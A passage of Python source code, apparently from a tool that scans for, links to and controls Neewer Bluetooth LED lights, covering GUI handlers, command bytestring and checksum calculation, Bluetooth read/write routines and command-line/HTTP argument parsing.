self.statusBar.showMessage("Current value (HSI Mode): " + updateStatus())
self.startSend()
# COMPUTE A BYTESTRING FOR THE ANIM SECTION
def computeValueANM(self, buttonPressed):
global lastAnimButtonPressed
if buttonPressed == 0:
buttonPressed = lastAnimButtonPressed
else:
# CHANGE THE OLD BUTTON COLOR BACK TO THE DEFAULT COLOR
if lastAnimButtonPressed == 1:
self.Button_1_police_A.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 2:
self.Button_1_police_B.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 3:
self.Button_1_police_C.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 4:
self.Button_2_party_A.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 5:
self.Button_2_party_B.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 6:
self.Button_2_party_C.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 7:
self.Button_3_lightning_A.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 8:
self.Button_3_lightning_B.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 9:
self.Button_3_lightning_C.setStyleSheet("background-color : None")
# CHANGE THE NEW BUTTON COLOR TO SHOW WHICH ANIMATION WE'RE CURRENTLY ON
if buttonPressed == 1:
self.Button_1_police_A.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 2:
self.Button_1_police_B.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 3:
self.Button_1_police_C.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 4:
self.Button_2_party_A.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 5:
self.Button_2_party_B.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 6:
self.Button_2_party_C.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 7:
self.Button_3_lightning_A.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 8:
self.Button_3_lightning_B.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 9:
self.Button_3_lightning_C.setStyleSheet("background-color : aquamarine")
lastAnimButtonPressed = buttonPressed
calculateByteString(colorMode="ANM",\
brightness=str(int(self.Slider_ANM_Brightness.value())),\
animation=str(buttonPressed))
self.statusBar.showMessage("Current value (ANM Mode): " + updateStatus())
self.startSend()
def turnLightOn(self):
setPowerBytestring("ON")
self.statusBar.showMessage("Turning light on")
self.startSend()
def turnLightOff(self):
setPowerBytestring("OFF")
self.statusBar.showMessage("Turning light off")
self.startSend()
# ==============================================================
# FUNCTIONS TO RETURN / MODIFY VALUES RUNNING IN THE GUI
# ==============================================================
# RETURN THE ROW INDEXES THAT ARE CURRENTLY HIGHLIGHTED IN THE TABLE VIEW
def selectedLights(self):
selectionList = []
if threadAction != "quit":
currentSelection = self.lightTable.selectionModel().selectedRows()
for a in range(len(currentSelection)):
selectionList.append(currentSelection[a].row()) # add the row index of the nth selected light to the selectionList array
return selectionList # return the row IDs that are currently selected, or an empty array ([]) otherwise
# UPDATE THE TABLE WITH THE CURRENT INFORMATION FROM availableLights
def updateLights(self):
self.clearTheTable()
if len(availableLights) != 0: # if we found lights on the last scan
if self.scanCommandButton.text() == "Scan":
self.scanCommandButton.setText("Re-scan") # change the "Scan" button to "Re-scan"
if len(availableLights) == 1: # we found 1 light
self.statusBar.showMessage("We located 1 Neewer light on the last search")
elif len(availableLights) > 1: # we found more than 1 light
self.statusBar.showMessage("We located " + str(len(availableLights)) + " Neewer lights on the last search")
else: # if we didn't find any (additional) lights on the last scan
self.statusBar.showMessage("We didn't locate any Neewer lights on the last search")
for a in range(len(availableLights)):
if availableLights[a][1] == "": # the light is not currently linked, so put "waiting to connect" as status
if availableLights[a][2] != "": # the light has a custom name, so add the custom name to the light
self.setTheTable([availableLights[a][2] + " (" + availableLights[a][0].name + ")" + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "Waiting", "Waiting to connect..."])
else: # the light does not have a custom name, so just use the model # of the light
self.setTheTable([availableLights[a][0].name + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "Waiting", "Waiting to connect..."])
else: # we have previously tried to connect, so we have a Bleak object - so put "waiting to send" as status
if availableLights[a][2] != "": # the light has a custom name, so add the custom name to the light
self.setTheTable([availableLights[a][2] + " (" + availableLights[a][0].name + ")" + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "LINKED", "Waiting to send..."])
else: # the light does not have a custom name, so just use the model # of the light
self.setTheTable([availableLights[a][0].name + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "LINKED", "Waiting to send..."])
# THE FINAL FUNCTION TO UNLINK ALL LIGHTS WHEN QUITTING THE PROGRAM
def closeEvent(self, event):
global threadAction
# WAIT UNTIL THE BACKGROUND THREAD SETS THE threadAction FLAG TO finished SO WE CAN UNLINK THE LIGHTS
while threadAction != "finished": # wait until the background thread has a chance to terminate
printDebugString("Waiting for the background thread to terminate...")
threadAction = "quit" # make sure to tell the thread to quit again (if it missed it the first time)
time.sleep(2)
loop = asyncio.get_event_loop()
# THE THREAD HAS TERMINATED, NOW CONTINUE...
self.statusBar.showMessage("Quitting program - unlinking from lights...")
QApplication.processEvents() # force the status bar to update
# TRY TO DISCONNECT EACH LIGHT FROM BLUETOOTH BEFORE QUITTING THE PROGRAM COMPLETELY
for a in range (0, len(availableLights)):
printDebugString("Attempting to unlink from light #" + str(a + 1) + " (" + str(a + 1) + " of " + str(len(availableLights)) + " lights to unlink)")
self.statusBar.showMessage("Attempting to unlink from light #" + str(a + 1) + " (" + str(a + 1) + " of " + str(len(availableLights)) + " lights to unlink)...")
QApplication.processEvents() # force update to show statusbar progress
loop.run_until_complete(disconnectFromLight(a)) # disconnect from each light, one at a time
printDebugString("Closing the program NOW")
# SET UP THE GUI BASED ON COMMAND LINE ARGUMENTS
def setUpGUI(self, **modeArgs):
if modeArgs["colorMode"] == "CCT":
self.ColorModeTabWidget.setCurrentIndex(0)
self.Slider_CCT_Hue.setValue(modeArgs["temp"])
self.Slider_CCT_Bright.setValue(modeArgs["brightness"])
self.computeValueCCT()
elif modeArgs["colorMode"] == "HSI":
self.ColorModeTabWidget.setCurrentIndex(1)
self.Slider_HSI_1_H.setValue(modeArgs["hue"])
self.Slider_HSI_2_S.setValue(modeArgs["sat"])
self.Slider_HSI_3_L.setValue(modeArgs["brightness"])
self.computeValueHSI()
elif modeArgs["colorMode"] == "ANM":
self.ColorModeTabWidget.setCurrentIndex(2)
self.Slider_ANM_Brightness.setValue(modeArgs["brightness"])
self.computeValueANM(modeArgs["scene"])
except NameError:
pass # could not load the GUI, but we have already logged an error message
def returnMACname():
# RETURN THE CORRECT NAME FOR THE IDENTIFIER OF THE LIGHT (FOR DEBUG STRINGS)
if platform.system() == "Darwin":
return "UUID:"
else:
return "MAC Address:"
def testValid(theParam, theValue, defaultValue, startBounds, endBounds):
if theParam == "temp":
if len(theValue) > 1: # if the temp has at least 2 characters in it
theValue = theValue[:2] # take the first 2 characters of the string to convert into int
else: # it either doesn't have enough characters, or isn't a number
printDebugString(" >> error with --temp specified (not enough digits or not a number), so falling back to default value of " + str(defaultValue))
theValue = defaultValue # default to 56(00)K for color temperature
try: # try converting the string into an integer and processing the bounds
theValue = int(theValue) # the value is assumed to be within the bounds, so we check it...
if theValue < startBounds or theValue > endBounds: # the value is not within bounds, so there's an error
if theValue < startBounds: # if the value specified is below the starting boundary, make it the starting boundary
printDebugString(" >> --" + theParam + " (" + str(theValue) + ") isn't between the bounds of " + str(startBounds) + " and " + str(endBounds) + ", so falling back to closest boundary of " + str(startBounds))
theValue = startBounds
elif theValue > endBounds: # if the value specified is above the ending boundary, make it the ending boundary
printDebugString(" >> --" + theParam + " (" + str(theValue) + ") isn't between the bounds of " + str(startBounds) + " and " + str(endBounds) + ", so falling back to closest boundary of " + str(endBounds))
theValue = endBounds
return theValue # return the within-bounds value
except ValueError: # if the string can not be converted, then return the defaultValue
printDebugString(" >> --" + theParam + " specified is not a number - falling back to default value of " + str(defaultValue))
return defaultValue # return the default value
# PRINT A DEBUG STRING TO THE CONSOLE, ALONG WITH THE CURRENT TIME
def printDebugString(theString):
if printDebug == True:
now = datetime.now()
currentTime = now.strftime("%H:%M:%S")
print("[" + currentTime + "] - " + theString)
# CALCULATE THE BYTESTRING TO SEND TO THE LIGHT
def calculateByteString(**modeArgs):
global sendValue
if modeArgs["colorMode"] == "CCT":
# We're in CCT (color balance) mode
sendValue = [120, 135, 2, 0, 0, 0]
sendValue[3] = int(modeArgs["brightness"]) # the brightness value
sendValue[4] = int(modeArgs["temp"]) # the color temp value, ranging from 32(00K) to 85(00)K - some lights (like the SL-80) can go as high as 8500K
sendValue[5] = calculateChecksum(sendValue) # compute the checksum
elif modeArgs["colorMode"] == "HSI":
# We're in HSI (any color of the spectrum) mode
sendValue = [120, 134, 4, 0, 0, 0, 0, 0]
sendValue[3] = int(modeArgs["HSI_H"]) & 255 # hue value, up to 255
sendValue[4] = (int(modeArgs["HSI_H"]) & 65280) >> 8 # offset value, computed from above value
sendValue[5] = int(modeArgs["HSI_S"]) # saturation value
sendValue[6] = int(modeArgs["HSI_I"]) # intensity value
sendValue[7] = calculateChecksum(sendValue) # compute the checksum
elif modeArgs["colorMode"] == "ANM":
# We're in ANM (animation) mode
sendValue = [120, 136, 2, 0, 0, 0]
sendValue[3] = int(modeArgs["brightness"]) # brightness value
sendValue[4] = int(modeArgs["animation"]) # the number of animation you're going to run (check comments above)
sendValue[5] = calculateChecksum(sendValue) # compute the checksum
else:
sendValue = [0]
# RECALCULATE THE BYTESTRING FOR CCT-ONLY NEEWER LIGHTS INTO HUE AND BRIGHTNESS SEPARATELY
def calculateSeparateBytestrings(sendValue):
# CALCULATE BRIGHTNESS ONLY PARAMETER FROM MAIN PARAMETER
newValueBRI = [120, 130, 1, sendValue[3], 0]
newValueBRI[4] = calculateChecksum(newValueBRI)
# CALCULATE HUE ONLY PARAMETER FROM MAIN PARAMETER
newValueHUE = [120, 131, 1, sendValue[4], 0]
newValueHUE[4] = calculateChecksum(newValueHUE)
if CCTSlider == -1: # return both newly computed values
return [newValueBRI, newValueHUE]
elif CCTSlider == 1: # return only the brightness value
return newValueBRI
elif CCTSlider == 2: # return only the hue value
return newValueHUE
def setPowerBytestring(onOrOff):
global sendValue
if onOrOff == "ON":
sendValue = [120, 129, 1, 1, 251] # return the "turn on" bytestring
else:
sendValue = [120, 129, 1, 2, 252] # return the "turn off" bytestring
# MAKE CURRENT BYTESTRING INTO A STRING OF HEX CHARACTERS TO SHOW THE CURRENT VALUE BEING GENERATED BY THE PROGRAM
def updateStatus(splitString = False, customValue=False):
currentHexString = ""
if customValue == False:
customValue = sendValue
if splitString == False: # False is for the status bar (shows the bytestring computed as one long line)
for a in range(len(customValue)):
currentHexString = currentHexString + " " + str(hex(customValue[a]))
else: # True is for the table view, this view no longer shows bytestring, but readable status of current mode (temp/bri/hue, etc.)
currentHexString = ""
if customValue[1] == 134:
currentHexString = "(HSI MODE):\n"
currentHexString = currentHexString + " H: " + str(customValue[3] + (256 * customValue[4])) + u'\N{DEGREE SIGN}' + " / S: " + str(customValue[5]) + " / I: " + str(customValue[6])
elif customValue[1] == 135:
currentHexString = "(CCT MODE):\n"
currentHexString = currentHexString + " TEMP: " + str(customValue[4]) + "00K / BRI: " + str(customValue[3])
elif customValue[1] == 136:
currentHexString = "(ANM/SCENE MODE):\n"
currentHexString = currentHexString + " SCENE: " + str(customValue[4]) + " / BRI: " + str(customValue[3])
return currentHexString
# CALCULATE THE CHECKSUM FROM THE BYTESTRING
def calculateChecksum(sendValue):
checkSum = 0
for a in range(len(sendValue) - 1):
if sendValue[a] < 0:
checkSum = checkSum + int(sendValue[a] + 256)
else:
checkSum = checkSum + int(sendValue[a])
checkSum = checkSum & 255
return checkSum
# FIND NEW LIGHTS
async def findDevices():
global availableLights
printDebugString("Searching for new lights")
currentScan = [] # add all the current scan's lights detected to a standby array (to check against the main one)
devices = await BleakScanner.discover() # scan all available Bluetooth devices nearby
for d in devices: # go through all of the devices Bleak just found
try:
d.name.index("NEEWER") # try to see if the current device has the name "NEEWER" in it
except ValueError:
pass # if the current device doesn't ^^^^, then this error is thrown
else:
currentScan.append(d) # and if it finds the phrase, add it to this session's available lights
for a in range(len(currentScan)): # scan the newly found NEEWER devices
newLight = True # initially mark this light as a "new light"
# check the "new light" against the global list
for b in range(len(availableLights)):
if currentScan[a].address == availableLights[b][0].address: # if the new light's MAC address matches one already in the global list
printDebugString("Light found! [" + currentScan[a].name + "] " + returnMACname() + " " + currentScan[a].address + " but it's already in the list. It may have disconnected, so relinking might be necessary.")
newLight = False # then don't add another instance of it
# if we found the light *again*, it's most likely the light disconnected, so we need to link it again
availableLights[b][0].rssi = currentScan[a].rssi # update the RSSI information
availableLights[b][1] = "" # clear the Bleak connection (as it's changed) to force the light to need re-linking
break # stop checking if we've found a negative result
if newLight == True: # if this light was not found in the global list, then we need to add it
printDebugString("Found new light! [" + currentScan[a].name + "] " + returnMACname() + " " + currentScan[a].address + " RSSI: " + str(currentScan[a].rssi) + " dBm")
customPrefs = getCustomLightPrefs(currentScan[a].address, currentScan[a].name)
availableLights.append([currentScan[a], "", customPrefs[0], [], customPrefs[1], customPrefs[2], True, ["---", "---"]]) # add it to the global list
if threadAction != "quit":
return "" # once the device scan is over, set the threadAction to nothing
else: # if we're requesting that we quit, then just quit
return "quit"
def getCustomLightPrefs(MACAddress, lightName = ""):
customPrefsPath = MACAddress.split(":")
customPrefsPath = os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs" + os.sep + "".join(customPrefsPath)
if os.path.exists(customPrefsPath):
printDebugString("A custom preferences file was found for " + MACAddress + "!")
# READ THE PREFERENCES FILE INTO A LIST
fileToOpen = open(customPrefsPath)
customPrefs = fileToOpen.read().split("|")
fileToOpen.close()
# CHANGE STRING "Booleans" INTO ACTUAL BOOLEANS
for b in range(1,3):
if customPrefs[b] == "True":
customPrefs[b] = True
else:
customPrefs[b] = False
else: # if there is no custom preferences file, still check the name against a list of per-light parameters
if lightName == "NEEWER-SL80": # we can use extended ranges with the SL80
customPrefs = ["", True, False]
elif lightName == "NEEWER-SNL660": # we can ONLY use CCT mode with the SNL-660
customPrefs = ["", False, True]
else: # return a blank slate
customPrefs = ["", False, False]
return customPrefs
# CONNECT (LINK) TO A LIGHT
async def connectToLight(selectedLight, updateGUI=True):
global availableLights
isConnected = False # whether or not the light is connected
returnValue = "" # the value to return to the thread (in GUI mode, a string) or True/False (in CLI mode, a boolean value)
# FILL THE [1] ELEMENT OF THE availableLights ARRAY WITH THE BLEAK CONNECTION
if availableLights[selectedLight][1] == "":
availableLights[selectedLight][1] = BleakClient(availableLights[selectedLight][0])
await asyncio.sleep(0.25) # wait just a short time before trying to connect
# TRY TO CONNECT TO THE LIGHT SEVERAL TIMES BEFORE GIVING UP THE LINK
currentAttempt = 1
while isConnected == False and currentAttempt <= maxNumOfAttempts:
if threadAction != "quit":
printDebugString("Attempting to link to light " + str(selectedLight + 1) + " [" + availableLights[selectedLight][0].name + "] " + returnMACname() + " " + availableLights[selectedLight][0].address + " (Attempt " + str(currentAttempt) + " of " + str(maxNumOfAttempts) + ")")
try:
if not availableLights[selectedLight][1].is_connected: # if the current device isn't linked to Bluetooth
isConnected = await availableLights[selectedLight][1].connect() # try connecting it (and return the connection status)
else:
isConnected = True # the light is already connected, so mark it as being connected
except Exception as e:
printDebugString("Error linking to light " + str(selectedLight + 1) + " [" + availableLights[selectedLight][0].name + "] " + returnMACname() + " " + availableLights[selectedLight][0].address)
if updateGUI == True:
mainWindow.setTheTable(["", "", "NOT\nLINKED", "There was an error connecting to the light, trying again (Attempt " + str(currentAttempt + 1) + " of " + str(maxNumOfAttempts) + ")..."], selectedLight) # there was an issue connecting this specific light to Bluetooh, so show that
else:
returnValue = False # if we're in CLI mode, and there is an error connecting to the light, return False
currentAttempt = currentAttempt + 1
else:
return "quit"
if threadAction == "quit":
return "quit"
else:
if isConnected == True:
printDebugString("Successfully linked to light " + str(selectedLight + 1) + " [" + availableLights[selectedLight][0].name + "] " + returnMACname() + " " + availableLights[selectedLight][0].address)
if updateGUI == True:
await getLightChannelandPower(selectedLight)
mainWindow.setTheTable(["", "", "LINKED\n" + availableLights[selectedLight][7][0] + " / ᴄʜ. " + str(availableLights[selectedLight][7][1]), "Waiting to send..."], selectedLight) # if it's successful, show that in the table
else:
returnValue = True # if we're in CLI mode, and there is no error connecting to the light, return True
else:
if updateGUI == True:
mainWindow.setTheTable(["", "", "NOT\nLINKED", "There was an error connecting to the light"], selectedLight) # there was an issue connecting this specific light to Bluetooh, so show that
returnValue = False # the light is not connected
return returnValue # once the connection is over, then return either True or False (for CLI) or nothing (for GUI)
async def readNotifyCharacteristic(selectedLight, diagCommand):
# clear the global variable before asking the light for info
global receivedData
receivedData = ""
try:
await availableLights[selectedLight][1].start_notify(notifyLightUUID, notifyCallback) # start reading notifications from the light
except Exception as e:
return "" # if there is an error starting the characteristic scan, just quit out of this routine
for a in range(maxNumOfAttempts): # attempt maxNumOfAttempts times to read the characteristics
try:
await availableLights[selectedLight][1].write_gatt_char(setLightUUID, bytearray(diagCommand))
except Exception as e:
return "" # if there is an error checking the characteristic, just quit out of this routine
if receivedData != "":
break # we found data, so we can stop checking
else:
await asyncio.sleep(0.25) # wait a little bit of time before checking again
try:
await availableLights[selectedLight][1].stop_notify(notifyLightUUID) # stop reading notifications from the light
except Exception as e:
pass # we will return whatever data remains from the scan, so if we can't stop the scan (light disconnected), just return what we have
return receivedData
async def getLightChannelandPower(selectedLight):
global availableLights
returnInfo = ["---", "---"] # the information to return to the light
powerInfo = await readNotifyCharacteristic(selectedLight, [120, 133, 0, 253])
if powerInfo != "" and powerInfo[3] == 1:
returnInfo[0] = "ON"
# IF THE LIGHT IS ON, THEN ATTEMPT TO READ THE CURRENT CHANNEL
chanInfo = await readNotifyCharacteristic(selectedLight, [120, 132, 0, 252])
if chanInfo != "": # if we got a result from the query
try:
returnInfo[1] = chanInfo[3] # set the current channel to the returned result
except IndexError:
pass # if we have an index error (the above value doesn't exist), then just return -1
elif powerInfo != "" and powerInfo[3] == 2:
returnInfo[0] = "STBY"
availableLights[selectedLight][7][0] = returnInfo[0]
if availableLights[selectedLight][1] != "---" and returnInfo[1] != "---":
availableLights[selectedLight][7][1] = returnInfo[1]
def notifyCallback(sender, data):
global receivedData
receivedData = data
# DISCONNECT FROM A LIGHT
async def disconnectFromLight(selectedLight, updateGUI=True):
returnValue = "" # same as above, string for GUI mode and boolean for CLI mode, default to blank string
if availableLights[selectedLight][1] != "": # if there is a Bleak object attached to the light, try to disconnect
try:
if availableLights[selectedLight][1].is_connected: # if the current light is connected
await availableLights[selectedLight][1].disconnect() # disconnect the selected light
except Exception as e:
returnValue = False # if we're in CLI mode, then return False if there is an error disconnecting
printDebugString("Error unlinking from light " + str(selectedLight + 1) + " [" + availableLights[selectedLight][0].name + "] " + returnMACname() + " " + availableLights[selectedLight][0].address)
print(e)
try:
if not availableLights[selectedLight][1].is_connected: # if the current light is NOT connected, then we're good
if updateGUI == False:
returnValue = True # if we're in CLI mode, then return False if there is an error disconnecting
printDebugString("Successfully unlinked from light " + str(selectedLight + 1) + " [" + availableLights[selectedLight][0].name + "] " + returnMACname() + " " + availableLights[selectedLight][0].address)
except AttributeError:
printDebugString("Light " + str(selectedLight + 1) + " has no Bleak object attached to it, so not attempting to disconnect from it")
return returnValue
# WRITE TO A LIGHT - optional arguments for the CLI version (GUI version doesn't use either of these)
async def writeToLight(selectedLights=0, updateGUI=True):
returnValue = "" # same as above, return value "" for GUI, or boolean for CLI
startTimer = time.time() # the start of the triggering
printDebugString("Going into send mode")
try:
if updateGUI == True:
selectedLights = mainWindow.selectedLights() # get the list of currently selected lights from the GUI table
else:
if type(selectedLights) is int: # if we specify an integer-based index
selectedLights = [selectedLights] # convert asked-for light to list
currentSendValue = [] # initialize the value check
# if there are lights selected (otherwise just dump out), and the delay timer is less than it's maximum, then try to send to the lights selected
while (len(selectedLights) > 0 and time.time() - startTimer < 0.4) :
if currentSendValue != sendValue: # if the current value is different than what was last sent to the light, then send a new one
currentSendValue = sendValue # get this value before sending to multiple lights, to ensure the same value is sent to each one
for a in range(len(selectedLights)): # try to write each light in turn, and show the current data being sent to them in the table
if availableLights[selectedLights[a]][1] != "": # if a Bleak connection is there
try:
if availableLights[(int(selectedLights[a]))][5] == True: # if we're using the old style of light
if currentSendValue[1] == 135: # if we're on CCT mode
if CCTSlider == -1: # and we need to write both HUE and BRI to the light
splitCommands = calculateSeparateBytestrings(currentSendValue) # get both commands from the converter
# WRITE BOTH LUMINANCE AND HUE VALUES TOGETHER, BUT SEPARATELY
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(splitCommands[0]), False)
await asyncio.sleep(0.05) # wait 1/20th of a second to give the Bluetooth bus a little time to recover
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(splitCommands[1]), False)
else: # we're only writing either HUE or BRI independently
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(calculateSeparateBytestrings(currentSendValue)), False)
elif currentSendValue[1] == 129: # we're using an old light, but we're either turning the light on or off
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(currentSendValue), False)
elif currentSendValue[1] == 134: # we can't use HSI mode with this light, so show that
if updateGUI == True:
mainWindow.setTheTable(["", "", "", "This light can not use HSI mode"], int(selectedLights[a]))
else:
returnValue = True # we successfully wrote to the light (or tried to at least)
elif currentSendValue[1] == 136: # we can't use ANM/SCENE mode with this light, so show that
if updateGUI == True:
mainWindow.setTheTable(["", "", "", "This light can not use ANM/SCENE mode"], int(selectedLights[a]))
else:
returnValue = True # we successfully wrote to the light (or tried to at least)
else: # we're using a "newer" Neewer light, so just send the original calculated value
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(currentSendValue), False)
if updateGUI == True:
# if we're not looking at an old light, or if we are, we're not in either HSI or ANM modes, then update the status of that light
if not (availableLights[(int(selectedLights[a]))][5] == True and (currentSendValue[1] == 134 or currentSendValue[1] == 136)):
if currentSendValue[1] != 129: # if we're not turning the light on or off
mainWindow.setTheTable(["", "", "", updateStatus(True)], int(selectedLights[a]))
else: # we ARE turning the light on or off
if currentSendValue[3] == 1: # we turned the light on
availableLights[int(selectedLights[a])][6] = True # toggle the "light on" parameter of this light to ON
changeStatus = mainWindow.returnTableInfo(selectedLights[a], 2).replace("STBY", "ON")
mainWindow.setTheTable(["", "", changeStatus, "Light turned on"], int(selectedLights[a]))
else: # we turned the light off
availableLights[int(selectedLights[a])][6] = False # toggle the "light on" parameter of this light to OFF
changeStatus = mainWindow.returnTableInfo(selectedLights[a], 2).replace("ON", "STBY")
mainWindow.setTheTable(["", "", changeStatus, "Light turned off\nA long period of inactivity may require a re-link to the light"], int(selectedLights[a]))
else:
returnValue = True # we successfully wrote to the light
if currentSendValue[1] != 129: # if we didn't just send a command to turn the light on/off
availableLights[selectedLights[a]][3] = currentSendValue # store the currenly sent value to recall later
except Exception as e:
if updateGUI == True:
mainWindow.setTheTable(["", "", "", "Error Sending to light!"], int(selectedLights[a]))
else: # if there is no Bleak object associated with this light (otherwise, it's been found, but not linked)
if updateGUI == True:
mainWindow.setTheTable(["", "", "", "Light isn't linked yet, can't send to it"], int(selectedLights[a]))
else:
returnValue = 0 # the light is not linked, even though it *should* be if it gets to this point, so this is an odd error
startTimer = time.time() # if we sent a value, then reset the timer
await asyncio.sleep(0.05) # wait 1/20th of a second to give the Bluetooth bus a little time to recover
if updateGUI == True:
selectedLights = mainWindow.selectedLights() # re-acquire the current list of selected lights
except Exception as e:
printDebugString("There was an error communicating with the light.")
print(e)
if updateGUI == True:
returnValue = False # there was an error writing to this light, so return false to the CLI
if updateGUI == True:
if threadAction != "quit": # if we've been asked to quit somewhere else in the program
printDebugString("Leaving send mode and going back to background thread")
else:
printDebugString("The program has requested to quit, so we're not going back to the background thread")
returnValue = "quit"
return returnValue
# USE THIS FUNCTION TO CONNECT TO ONE LIGHT (for CLI mode) AND RETRIEVE ANY CUSTOM PREFS (necessary for lights like the SNL-660)
async def connectToOneLight(MACAddress):
global availableLights
try:
currentLightToAdd = await BleakScanner.find_device_by_address(MACAddress)
customLightPrefs = getCustomLightPrefs(currentLightToAdd.address, currentLightToAdd.name)
availableLights = [[currentLightToAdd, "", customLightPrefs[0], [], customLightPrefs[1], customLightPrefs[2], True]]
except Exception as e:
printDebugString("Error finding the Neewer light with MAC address " + MACAddress)
print(e)
# THE BACKGROUND WORKER THREAD
def workerThread(_loop):
global threadAction
if startup_findLights == True: # if we're set to find lights at startup, then automatically set the thread to discovery mode
threadAction = "discover"
delayTicks = 1 # count a few ticks before checking light information
while True:
if delayTicks < 12:
delayTicks += 1
elif delayTicks == 12:
delayTicks = 1
printDebugString("Background Thread Running")
# CHECK EACH LIGHT AGAINST THE TABLE TO SEE IF THERE ARE CONNECTION ISSUES
for a in range(len(availableLights)):
if threadAction == "": # if we're not sending, then update the light info... (check this before scanning each light)
if availableLights[a][1] != "": # if there is a Bleak object, then check to see if it's connected
if not availableLights[a][1].is_connected: # the light is disconnected, but we're reporting it isn't
mainWindow.setTheTable(["", "", "NOT\nLINKED", "Light disconnected!"], a) # show the new status in the table
availableLights[a][1] = "" # clear the Bleak object
else:
_loop.run_until_complete(getLightChannelandPower(a))
mainWindow.setTheTable(["", "", "LINKED\n" + availableLights[a][7][0] + " / ᴄʜ. " + str(availableLights[a][7][1]), ""], a)
if threadAction == "quit":
printDebugString("Stopping the background thread")
threadAction = "finished"
break # stop the background thread before quitting the program
elif threadAction == "discover":
threadAction = _loop.run_until_complete(findDevices()) # add new lights to the main array
if threadAction != "quit":
mainWindow.updateLights() # tell the GUI to update its list of available lights
if startup_connectLights == True: # if we're set to automatically link to the lights on startup, then do it here
for a in range(len(availableLights)):
if threadAction != "quit": # if we're not supposed to quit, then try to connect to the light(s)
threadAction = _loop.run_until_complete(connectToLight(a)) # connect to each light in turn
elif threadAction == "connect":
selectedLights = mainWindow.selectedLights() # get the list of currently selected lights
for a in range(len(mainWindow.selectedLights())): # and try to link to each of those lights
threadAction = _loop.run_until_complete(connectToLight(selectedLights[a]))
elif threadAction == "send":
threadAction = _loop.run_until_complete(writeToLight()) # write a value to the light(s) - the selectedLights() section is in the write loop itself for responsiveness
time.sleep(0.25)
def processCommands(listToProcess=[]):
inStartupMode = False # if we're in startup mode (so report that to the log), start as False initially to be set to True below
# SET THE CURRENT LIST TO THE sys.argv SYSTEM PARAMETERS LIST IF A LIST ISN'T SPECIFIED
# SO WE CAN USE THIS SAME FUNCTION TO PARSE HTML ARGUMENTS USING THE HTTP SERVER AND COMMAND-LINE ARGUMENTS
if len(listToProcess) == 0: # if there aren't any elements in the list, then check against sys.argv
listToProcess = sys.argv[1:] # the list to parse is the system args minus the first one
inStartupMode = True
# ADD DASHES TO ANY PARAMETERS THAT DON'T CURRENTLY HAVE THEM AS WELL AS
# CONVERT ALL ARGUMENTS INTO lower case (to allow ALL CAPS arguments to parse correctly)
for a in range(len(listToProcess)):
if listToProcess[a] != "-h" and listToProcess[a][:2] != "--": # if the dashes aren't in the current item (and it's not the -h flag)
if listToProcess[a][:1] == "-": # if the current parameter only has one dash (typed wrongly)
listToProcess[a] = "--" + listToProcess[a][1:].lower() # then remove that, and add the double dash and switch to lowercase
else: # the parameter has no dashes at all, so add them
listToProcess[a] = "--" + listToProcess[a].lower() # add the dashes + switch to lowercase to properly parse as arguments below
else: # if the dashes are already in the current item
listToProcess[a] = listToProcess[a].lower() # we don't need to add dashes, so just switch to lowercase
# DELETE ANY INVALID ARGUMENTS FROM THE COMMAND LINE BEFORE RUNNING THE ARGUMENT PARSER
# TO CLEAN UP THE ARGUMENT LIST AND ENSURE THE PARSER CAN STILL RUN WHEN INVALID ARGUMENTS ARE PRESENT
if inStartupMode == True:
acceptable_arguments = ["--http", "--cli", "--silent", "--light", "--mode", "--temp", "--hue",
"--sat", "--bri", "--intensity", "--scene", "--animation", "--help", "--off", "--on", "--list"]
else: # if we're doing HTTP processing, we don't need the http, cli, silent and help flags, so toss 'em
acceptable_arguments = ["--light", "--mode", "--temp", "--hue", "--sat", "--bri", "--intensity",
"--scene", "--animation", "--list", "--discover", "--link", "--off", "--on"]
# KICK OUT ANY PARAMETERS THAT AREN'T IN THE "ACCEPTABLE ARGUMENTS" LIST
for a in range(len(listToProcess) - 1, -1, -1):
if not any(x in listToProcess[a] for x in acceptable_arguments): # if the current argument is invalid
if inStartupMode == True:
if listToProcess[a] != "-h": # and the argument isn't "-h" (for help)
listToProcess.pop(a) # delete the invalid argument from the list
else: # if we're not in startup mode, then also delete the "-h" flag
listToProcess.pop(a) # delete the invalid argument from the list
# IF THERE ARE NO VALID PARAMETERS LEFT TO PARSE, THEN RETURN THAT TO THE HTTP SERVER
if inStartupMode == False and len(listToProcess) == 0:
printDebugString("There are no usable parameters from the HTTP request!")
return []
# FORCE VALUES THAT NEED PARAMETERS TO HAVE ONE, AND VALUES THAT REQUIRE NO PARAMETERS TO HAVE NONE
for a in range(len(listToProcess)):
if listToProcess[a].find("--silent") != -1:
listToProcess[a] = "--silent"
elif listToProcess[a].find("--cli") != -1:
listToProcess[a] = "--cli"
elif listToProcess[a].find("--html") != -1:
listToProcess[a] = "--html"
elif listToProcess[a].find("--list") != -1:
listToProcess[a] = "--list"
elif listToProcess[a].find("--discover") != -1:
listToProcess[a] = "--discover"
elif listToProcess[a].find("--off") != -1:
listToProcess[a] = "--off"
elif listToProcess[a].find("--on") != -1:
